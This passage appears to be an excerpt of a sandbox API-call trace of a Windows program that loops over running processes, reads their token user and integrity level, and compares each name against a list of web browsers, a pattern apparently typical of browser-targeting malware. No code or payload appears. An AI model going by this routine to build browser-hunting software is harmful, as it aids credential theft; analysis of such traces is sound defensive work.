OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0598.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0598.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0598.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0598.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0598.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0598.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0598.706] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0598.706] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0598.706] GetLastError () returned 0x7a [0598.706] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0598.706] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0598.706] CloseHandle (hObject=0x668) returned 1 [0598.707] CloseHandle (hObject=0x298) returned 1 [0598.707] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0598.707] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0598.707] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0598.707] GetLastError () returned 0x7a [0598.707] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0598.707] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0598.707] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0598.707] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0598.707] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0598.707] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0598.707] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0598.707] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0598.707] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0598.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0598.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0598.707] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0598.707] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0598.707] GetLastError () returned 0x7a [0598.708] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0598.708] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0598.708] CloseHandle (hObject=0x668) returned 1 [0598.708] CloseHandle (hObject=0x298) returned 1 [0598.708] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0598.708] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0598.708] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0598.708] GetLastError () returned 0x7a [0598.708] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0598.708] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0598.708] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0598.708] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0598.708] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0598.708] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0598.708] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0598.708] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0598.708] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0598.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0598.708] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0598.709] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0598.709] GetLastError () returned 0x7a [0598.709] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0598.709] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0598.709] CloseHandle (hObject=0x668) returned 1 [0598.709] CloseHandle (hObject=0x298) returned 1 [0598.709] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0598.709] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0598.709] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0598.709] GetLastError () returned 0x7a [0598.709] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0598.709] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0598.709] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0598.709] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0598.709] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0598.709] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0598.709] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0598.709] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0598.709] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0598.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0598.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0598.709] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0598.710] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0598.710] GetLastError () returned 0x7a [0598.710] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0598.710] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0598.710] CloseHandle (hObject=0x668) returned 1 [0598.710] CloseHandle (hObject=0x298) returned 1 [0598.710] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0598.710] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0598.710] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0598.710] GetLastError () returned 0x7a [0598.710] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0598.710] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0598.710] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0598.710] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0598.710] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0598.710] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0598.710] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0598.710] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0598.710] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0598.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0598.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0598.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0598.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0598.710] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0598.710] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0598.710] GetLastError () returned 0x7a [0598.710] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0598.710] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0598.710] CloseHandle (hObject=0x668) returned 1 [0598.710] CloseHandle (hObject=0x298) returned 1 [0598.710] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0598.711] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0598.711] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0598.711] GetLastError () returned 0x7a [0598.711] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0598.711] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0598.711] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0598.711] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0598.711] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0598.711] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0598.711] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0598.711] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0598.711] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0598.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0598.711] VirtualFree (lpAddress=0x450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0598.711] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0600.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0x98e8) returned 0xc0000004 [0600.717] VirtualAlloc (lpAddress=0x0, dwSize=0xa8e8, flAllocationType=0x1000, flProtect=0x4) returned 0x450000 [0600.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x450000, Length=0xa8e8, ResultLength=0x0 | out: SystemInformation=0x450000, ResultLength=0x0) returned 0x0 [0600.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0600.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0600.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0600.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0600.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0600.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0600.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0600.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0600.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0600.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0600.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0600.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0600.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0600.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0600.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0600.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0600.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0600.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0600.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0600.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0600.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0600.721] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0600.721] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0600.721] GetLastError () returned 0x7a [0600.721] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0600.722] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0600.722] CloseHandle (hObject=0x668) returned 1 [0600.722] CloseHandle (hObject=0x298) returned 1 [0600.722] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0600.722] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0600.722] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0600.722] GetLastError () returned 0x7a [0600.722] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0600.722] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0600.722] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0600.722] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0600.722] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0600.722] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0600.722] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0600.722] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0600.722] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0600.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0600.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0600.722] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0600.722] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0600.722] GetLastError () returned 0x7a [0600.722] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0600.722] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0600.722] CloseHandle (hObject=0x668) returned 1 [0600.722] CloseHandle (hObject=0x298) returned 1 [0600.722] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0600.722] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0600.722] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0600.722] GetLastError () returned 0x7a [0600.722] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0600.723] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0600.723] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0600.723] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0600.723] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0600.723] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0600.723] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0600.723] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0600.723] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0600.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0600.723] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0600.723] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0600.723] GetLastError () returned 0x7a [0600.723] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0600.723] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0600.723] CloseHandle (hObject=0x668) returned 1 [0600.723] CloseHandle (hObject=0x298) returned 1 [0600.723] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0600.723] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0600.723] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0600.723] GetLastError () returned 0x7a [0600.723] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0600.723] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0600.723] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0600.723] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 